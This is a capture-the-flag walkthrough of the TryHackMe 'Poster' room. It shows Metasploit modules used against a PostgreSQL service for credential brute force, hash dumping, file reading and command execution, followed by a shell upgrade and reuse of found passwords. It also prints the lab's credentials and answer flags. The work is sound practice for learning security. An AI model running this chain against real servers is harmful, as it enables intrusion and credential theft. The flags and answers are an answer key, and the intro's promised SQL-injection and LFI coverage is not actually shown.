Poster TryHacMe Walkthrough

Santosh Kumar

The "Poster" room focuses on web application security, specifically SQL injection, directory traversal, and file inclusion vulnerabilities. You'll learn how to identify and exploit these vulnerabilities to gain access to sensitive information.

Key Concepts

• SQL Injection: A code injection technique that exploits a vulnerability in an application's software by manipulating SQL queries.
• Directory Traversal: A vulnerability that allows an attacker to access directories and files stored outside the web root folder.
• Local File Inclusion (LFI): A vulnerability that allows an attacker to include files on a server through the web browser.
• Privilege Escalation: The act of exploiting a bug or design flaw to gain elevated access to resources that are normally protected from an application or user.

Developing a Hacker Mindset

• Reconnaissance: Learn how to gather information about a target system, which is the first step in any penetration testing or hacking process.
• Exploitation: Practice exploiting various vulnerabilities, which helps in understanding how attackers think and operate.
• Privilege Escalation: Understand how to escalate privileges, a crucial skill for gaining deeper access into systems.

What is rdbms?

Depending on the EF Codd relational model, an RDBMS allows users to build, update, manage, and interact with a relational database, which stores data as a table.

Today, several companies use relational databases instead of flat files or hierarchical databases to store business data. This is because a relational database can handle a wide range of data formats and process queries efficiently. In addition, it organizes data into tables that can be linked internally based on common data. This allows the user to easily retrieve one or more tables with a single query. On the other hand, a flat file stores data in a single table structure, making it less efficient and consuming more space and memory.

Most commercially available RDBMSs currently use Structured Query Language (SQL) to access the database. RDBMS structures are most commonly used to perform CRUD operations (create, read, update, and delete), which are critical to support consistent data management.

Network scanning :

I started by scanning the ports with Rustscan.

I first did network scanning with rustscan and I found open ports SSH 22, HTTP 80, postgresql is running on 5432.

Answer the questions below.

What is the rdbms installed on the server?

Ans. postresql

What port is the rdbms running on?

Ans. 5432

Then I went to the website but I didn't find anything special there.

I run gobuster

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.17.168
         

I tried so hard but I did not get anything.

I can use Metasploit.

Metasploit contains a variety of modules that can be used to enumerate in multiple rdbms, making it easy to gather valuable information.

Ans. no answer needed

After starting Metasploit, search for an associated auxiliary module that allows us to enumerate user credentials. What is the full path of the modules (starting with auxiliary)?

Ans. auxiliary/scanner/postgres/postgres_login

Next, use Metasploit to gather login credential. I’m gonna use this module: auxiliary/scanner/postgres/postgres_login

show options

Set option RHOSTS and ran it.

What are the credentials you found?

example: user:password

Ans. postgres:password

What is the full path of the module that allows you to execute commands with the proper user credentials (starting with auxiliary)?

Ans. auxiliary/admin/postgres/postgres_sql

use auxiliary/admin/postgres/postgres_sql
set RHOSTS ip 
set PASSWORD  password        

Hashdump

use auxiliary/scanner/postgres/postgres_hashdump        

What is the full path of the module that allows for dumping user hashes (starting with auxiliary)?

Ans. auxiliary/scanner/postgres/postgres_hashdump

How many user hashes does the module dump?

Ans. 6

Directory Traversal/Local File Inclusion (LFI)

use auxiliary/admin/postgres/postgres_readfile        

What is the full path of the module (starting with auxiliary) that allows an authenticated user to view files of their choosing on the server?

Ans. auxiliary/admin/postgres/postgres_readfile

What is the full path of the module that allows arbitrary command execution with the proper user credentials (starting with exploit)?

Ans .exploit/multi/postgres/postgres_copy_from_program_cmd_exec

use exploit/multi/postgres/postgres_copy_from_program_cmd_exec        

python3 -c 'import pty; pty.spawn("/bin/bash")'
id        

cd /home 
ls        

I found two users here, I checked them one by one.

cd dark 
ls         

I opened the dark and found a file there which had a password.

su dark 
password:qwerty1234#!hackme        

cd /home ls cd alison ls

I found user.tst but we didn't have permission.So I went to /var/www/html and found a file called config.php which had the username and password.

Then login alison.

cd / home 
cat user.txt        

Compromise the machine and locate user.txt

Ans. THM{postgresql_fa1l_conf1gurat1on}

Escalate privileges and obtain root.txt

Escalate privileges and obtain root.txt

Ans.THM{c0ngrats_for_read_the_f1le_w1th_credent1als}

Thanks for Readinig